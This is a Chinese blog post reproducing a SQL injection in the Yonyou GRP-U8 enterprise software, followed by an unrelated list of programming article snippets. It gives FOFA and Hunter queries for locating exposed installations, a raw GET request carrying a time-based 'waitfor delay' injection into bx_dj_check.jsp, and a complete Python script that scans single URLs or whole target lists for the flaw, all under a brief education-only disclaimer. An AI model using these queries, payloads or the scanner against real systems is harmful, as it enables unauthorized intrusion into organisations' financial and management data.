【漏洞复现】用友GRP-U8——SQL注入

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

  • 漏洞描述
  • 漏洞复现
  • 测试工具


漏洞描述

用友GRP-U8是一款企业管理软件,其系统dialog_moreUser_check.jsp接口存在SQL注入漏洞。

漏洞复现

1)资产测绘
fofa:app="用友-GRP-U8"
hunter:app.name="用友-GRP-U8"
在这里插入图片描述
选秀环节!
在这里插入图片描述
2)构造数据包

GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip

burp!启动!

在这里插入图片描述

延迟响应了5041毫秒,存在sql注入~

代码解释:
waitfor delay '0:0:5'这是一个SQL Server特有的命令,它使当前SQL语句暂停执行5秒。通过检查响应时间来验证是否存在SQL注入漏洞。如果服务器响应时间明显增加(在这个例子中是5秒),这可能表明注入的SQL命令被执行了,从而验证了存在SQL注入漏洞。

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning# 定义颜色代码,用于控制台输出
RED = '\033[91m'
RESET = '\033[0m'# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def check_vulnerability(url):"""检测指定URL是否存在SQL注入漏洞。参数:- url: 目标网站的URL地址"""try:# 构造攻击URL,尝试触发SQL注入延迟attack_url = url.rstrip('/') + "/u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'--"# 记录请求开始时间start_time = time.time()# 发送GET请求,不验证SSL证书,设置超时时间response = requests.get(attack_url, verify=False, timeout=10)# 计算请求耗时elapsed_time = time.time() - start_time# 如果请求耗时在5到10秒之间,可能存在SQL注入漏洞if 5 < elapsed_time < 10:print(f"{RED}URL [{url}] 可能存在yonyou-grp-u8-bx_dj_check-sql-injection漏洞{RESET}")else:print(f"URL [{url}] 不存在漏洞")except requests.exceptions.Timeout:# 请求超时,可能存在漏洞print(f"URL [{url}] 请求超时,可能存在漏洞")except requests.RequestException as e:# 其他请求异常print(f"URL [{url}] 请求失败: {e}")def main():"""主函数,解析命令行参数并执行漏洞检测。"""parser = argparse.ArgumentParser(description='检测目标地址是否存在yonyou-grp-u8-sql-injection漏洞')parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')# 解析命令行参数args = parser.parse_args()# 如果提供了URL参数if args.url:# 确保URL以http或https开头if not args.url.startswith(("http://", "https://")):args.url = "http://" + args.urlcheck_vulnerability(args.url)# 如果提供了文件参数elif args.file:# 读取文件中的URL列表with open(args.file, 'r') as file:urls = file.read().splitlines()for url in urls:# 确保URL以http或https开头if not url.startswith(("http://", "https://")):url = "http://" + urlcheck_vulnerability(url)if __name__ == '__main__':main()

运行截图

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/36009.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

财务RPA案例研究——分析成功的财务RPA实施案例

现代社会正加速向数字时代转型&#xff0c;数字技术以崭新的模式全面融入各行业领域。为顺应新一轮科技革命和产业变革趋势&#xff0c;越来越多的企业不断深化应用大数据、云计算、人工智能等新一代信息技术&#xff0c;积极迎接数字化转型&#xff0c;而RPA技术由于能够以自动…

常用组件详解(二):torch.nn.Flatten、torch.flatten()

文章目录 torch.nn.Flattentorch.flatten() 官方API文档&#xff1a;点击跳转。torch.nn.Flatten是Pytorch提供的类&#xff0c;常用于将输入数据进行展平&#xff0c;而torch.flatten()函数与之功能相同。 torch.nn.Flatten 类初始化方式&#xff1a; torch.nn.Flatten(star…

React学习总结

一、React是什么 React是用于构建用户界面的JS库&#xff0c;是一个将数据渲染为HTML视图的开源JS库 为什么学&#xff1f; &#xff08;1&#xff09;原生JS操作DOM繁琐&#xff0c;效率低 &#xff08;2&#xff09;使用JS直接操作DOM&#xff0c;浏览器会进行大量的重绘…

算法基础详解

大O记法 为了统一描述&#xff0c;大O不关注算法所用的时间&#xff0c;只关注其所用的步数。 比如数组不论多大&#xff0c;读取都只需1步。用大O记法来表示&#xff0c;就是&#xff1a;O(1)很多人将其读作“大O1”&#xff0c;也有些人读成“1数量级”。一般读成“O1”。虽…

Spring Boot中的定时任务调度

Spring Boot中的定时任务调度 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01;今天我们将深入探讨如何在Spring Boot应用中实现定时任务调度&#xff0c;这在实际…

友力科技广州数据中心搬迁

搬迁工作内容 1.搬迁技术工作 1)确定机房搬迁的负责人以及负责人的联系方式&#xff0c;保证在搬迁的过程中统一指挥管理。 2)确定服务器的数量&#xff0c;服务器的型号&#xff0c;服务器的配置等&#xff0c;如有需要&#xff0c;联系相关服务器的供货商或者厂家提供技术支持…

PDF 如何高效的转换成 markdown

为什么需要把 PDF 转换成 Markdown 格式 在处理PDF文件时&#xff0c;将其转换为Markdown文件格式有以下几个主要原因&#xff1a; 结构化和可读性&#xff1a;Markdown通过识别结构元素&#xff08;如标题、标头、子标题、表格和图像&#xff09;来指定文档的固有结构&#xf…

【极速入门版】编程小白也能轻松上手Comate AI编程插件

文章目录 概念使用错误检测与修复能力API生成代码生成json格式做开发测试 在目前的百模大战中&#xff0c;AI编程助手是程序员必不可少的东西&#xff0c;市面上琳琅满目的产品有没有好用一点的&#xff0c;方便一点的呢&#xff1f;今天工程师令狐向大家介绍一款极易入门的国产…

容易混淆的ITAM与CMDB

在信息技术管理领域&#xff0c;IT资产管理&#xff08;ITAM&#xff09;和配置管理数据库&#xff08;CMDB&#xff09;是两个至关重要的工具。尽管它们在某些方面存在交集&#xff0c;但各自具备独特的功能和应用场景。本文将深入探讨ITAM和CMDB的概念、功能、优势&#xff0…

Linux内核 -- 多核操作之on_each_cpu函数实现与使用

使用 on_each_cpu 在多核系统中执行对称操作 背景介绍 在多核系统中&#xff0c;有时需要在每个 CPU 上执行特定的操作。这种操作需要确保每个 CPU 都能执行相同的函数&#xff0c;以实现对称的处理。在 Linux 内核中&#xff0c;提供了一个标准函数 on_each_cpu&#xff0c;…

mysql中in参数过多优化

优化方式概述 未优化前 SELECT * FROM rb_product rb where sku in(1022044,1009786)方案2示例 public static void main(String[] args) {//往list里面设置3000个值List<String> list new ArrayList<>();for (int i 0; i < 3000; i) {list.add(""…

python-docx 获取页面大小、设置页面大小(纸张大小)

本文目录 前言一、docx纸张大小介绍1、document.xml① 关于 document.xml 的一些知识点② 纸张大小在哪里③ 纸张大小都有啥④ EMU对应的尺寸列表二、获取docx纸张大小1、完整代码2、运行效果图三、python为docx设置纸张大小1、完整代码2、效果图前言 今天的这边文章,我们来说…

项目实训-vue(八)

项目实训-vue&#xff08;八&#xff09; 文章目录 项目实训-vue&#xff08;八&#xff09;1.概述2.医院动态图像轮播3.页面背景板4.总结 1.概述 除了系统首页的轮播图展示之外&#xff0c;还需要在医院的首页展示医院动态部分的信息&#xff0c;展示医院动态是为了确保患者、…

【PHP】控制摄像头缩放监控画面大小,并保存可视画面为图片

一、前言 功能描述 调用摄像头并可以控制缩放摄像头监控画面的大小&#xff0c;把可视画面保存为图片。 我使用的是USB摄像头&#xff0c;其他摄像头此方法应该也通用。 使用技术 使用到的技术比较简单&#xff0c;前端使用WebcamJS插件调用摄像头&#xff0c;并摄像头监控…

shell实用脚本1

参考公众号民工哥技术之路 场景一&#xff1a; 有两台服务器&#xff0c;a服务器的IP为11.0.1.18&#xff0c;b服务器的IP为11.0.1.12&#xff0c;都有个目录/app/tmp/test&#xff0c;我们需要比较这个目录里面的文件的一致性 #!/bin/bash ################################…

《mysql》--mysql约束

数据库约束 有的时候数据库中的数据是有一定要求的&#xff0c;有些数据认为是合法数据&#xff0c;有些是非法数据&#xff0c;如果靠人工检查显然是不靠谱的&#xff1b; 数据库会自动的对数据的合法性进行校验检查目的就是&#xff0c;保证数据中能够避免被插入/修改一些非…

Linux基础 - 使用 ssh 服务管理远程主机(window linux vscode)

目录 零. 简介 一. 打开linux shh 二. window连接linux 三. linux连接linux 四. VSCode远程 零. 简介 SSH&#xff08;Secure Shell&#xff09;服务是一种网络协议&#xff0c;主要用于在不安全的网络环境中为计算机之间的通信提供安全的加密连接。 SSH 服务具有以下重要…

二、安装虚拟机

本篇来源&#xff1a;山海同行 本篇地址&#xff1a;https://shanhaigo.cn/courseDetail/1805875642621952000 本篇资源&#xff1a;以整理到-山海同行 一、官网下载centos7 1. 进入CentOS 官方网站 官方网站&#xff1a;https://www.centos.org/download/ 2. 选择iso 点击下…

Java中的注解:原理与实战

Java中的注解&#xff1a;原理与实战 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01; Java注解&#xff08;Annotation&#xff09;是一种用于在代码中添加元数…

在nginx服务器发布项目以及在tomcat服务器发布项目

在nginx服务器发布项目&#xff1a; nginx有一个“热部署”或“无缝升级”的特性&#xff0c;这意味着在不停止服务的情况下&#xff0c;也可以更新配置文件和html文件夹。 如果上传的是配置文件&#xff0c;或者修改了nginx的配置&#xff0c;那么可能需要重启nginx来应用这…